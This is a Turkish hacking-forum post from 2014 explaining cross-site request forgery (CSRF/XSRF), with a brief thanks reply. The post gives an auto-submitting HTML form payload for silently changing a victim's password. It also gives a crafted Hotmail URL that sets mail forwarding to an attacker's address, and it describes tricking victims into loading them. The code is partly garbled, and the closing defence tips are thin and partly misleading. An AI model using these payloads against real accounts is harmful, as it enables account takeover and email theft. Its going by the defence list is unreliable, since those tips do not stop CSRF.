İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

XSRF - CSRF Hack

08-02-2014 14:55
#1
Dark-Man - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2013
Nereden:
I Don't Know
Mesajlar:
4.436
Teşekkür (Etti):
299
Teşekkür (Aldı):
1389
Konular:
1812
Ticaret:
(0) %
XSRF - CSRF (Cross-Site Request Forgery)

XSRF – CSRF günümüzün en yaygın ve en kullanışlı Web App. Security açığıdır.XSRF- CSRF İçinde XSS Bulunduran ve XSS alanında görülen bir güvenlik açığıdır. Kullanıcı parametresi kullanarak güven sağlamış gibi tehlike arz etmektedir.Bu uygulama ile “Banka Şifreleri, Para transfer uygulamaları,Mail Şifreleri …” gibi bir çok legal kullanımlar tehlike altındadır.

XSRF kullanım saldırganları kullanıcının kayıtlı bilgilerini kendi ellerindeki bir istemci tarafından kullanıcıya tıklattırarak değiştirebilirler.Bu durumda kullanıcı Online yani giriş yapmış olmalıdır.XSS kullanıcı bilgilerini kendi tarafına javascript kodlarıyla çekmek amaçlıdır fakat XSRF kullanıcının bilgileri kendi tarafından değiştirmek amaçlıdır.Gönderilen tek bir link ile bunu sağlamak mümkündür.

XSRF Exploiting:

XSRF ile saldırı yapabilmek için saldırganın yardımcı bir sistem kullanması gerekmektedir.Bu yardımcı sistem kullanılan ve bilgilerin alınması için gerekli Web sayfası olabilir.Saldırgan web sayfasındaki XSRF açığı oluşturan alanı kendine göre düzenleyip size farklı bir link ile sunabilir bilgilerinizi değiştirip kendi giriş yapabilir.

Kod:
site.com/password.php
Kullanıcı üstteki linkte giriş yaptığı alanda şifrelerini değiştirebilir olsun.

Kod:
site.com/password.php?pass=bugres
Şifre değişiminden sonra linkteki gibi bir URL uygulaması görüntüleniyor.

Böyle bir uygulama içerisinde Post ve Get Metotları kullanarak kullanıcının şifreleri sadece bir link ile değiştirilebilir.

Kod:
<b0dy onLoad="Submit();">
**********function Submit[]{********.BraveHeart.submit();}</script>

<form action=”/password.php” method="post">

<input type="text" name="password" />
<input class="button" type="submit" name="submit" value="Onay" />
Sayfa içerisindeki kodlamaya göre böyle bir kodlamayı HTML yaparak veya <img> içerisinde yolladığınız bir linkte saklayarak kurbana yedirmeniz doğrultusunda şifre değişecektir.XSRF uygulamaları sadece kodlama ile değil URL üzerinde de etkilemektedir.

Link uygulamasına Hotmail’den Bir Örnek:

Kod:
http://mail.live.com/mail/options.aspx?subsection=32&n=1%3f&POSTDATA=__eventTARGET%3dctl03%24SaveButton&__eventARGUMENT=&__VIEWSTATE=%2fwEPDwULLTEyMzQwMzk2ODcPZBYCAggPZBYCZg9kFgJmD2QWCAICDxYCHgRyb3dzBQEyZAIEDxYCHgV2YWx1ZQUYRGFoYSBlLXBvc3RhIGFkcmVzaSBla2xlZAIFDxYCHwEFBktheWRldGQCBg8WAh8BBQbEsHB0YWxkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYDBQ5jdGwwMyRSYWRpb09mZgUNY3RsMDMkUmFkaW9PbgUWY3RsMDMkS2VlcENvcHlDaGVja0JveOf%2bwlzIUyqbG5oP%2frmccAiY3eIj&mt=01.01_fd752da49866db5e6ed49192959bdcd540e8aae72b1187d212f9145b8b030f8e%7c9cac52df51db4610&ctl03$ForwardingToggle=2&ctl03$AddressTextBox=cwbraveheart%40windowslive.com&__eventVALIDATIon=%2fwEWBwLsj7HaDgLJ2PzyCgLI2PzyCgLb2%2fSaAwLTwd6HCQKuroqgBQKC1cmJB3uYq%2bbIhRlaUP23tLA1MirEOOcN&wa=wsignin1.0
Bu Örnekte URL Kriptolama İle Hotmail Üzerinden “Postalarınızı Başka Maile Gönderin” Bölümüne yazdırma yapabiliyoruz.Yalnız Hotmail Mail Oturumunuz Açık Olması Gerekmektedir.

XSRF Korunma Yöntemleri:

· GET Metot’u yerine POST Metot’u kullanabilirsiniz.

· Kullanıcı Parametresi veya Özel Bir sunucu isteyerek engelleyebilirsiniz.

· İstemci yönlendirmesi kullanabilirsiniz.

Alıntıdır.

Örnek Videolar:


XSRF setting up the attack) - YouTube

CSRF Hacking - YouTube

Örnek Konular:

http://www.turkhackteam.net/web-serv...l-yapilir.html

http://www.turkhackteam.net/web-serv...l-yapilir.html

Kullanıcı İmzası
İmkansızı hedefle.

08-02-2014 15:00
#2
xxHxxHxx - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2013
Mesajlar:
1.225
Teşekkür (Etti):
156
Teşekkür (Aldı):
135
Konular:
120
Ticaret:
(0) %
Eline sağlık.
Kullanıcı İmzası
Ben bir Türk'üm. Dinim, cinsim uludur.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı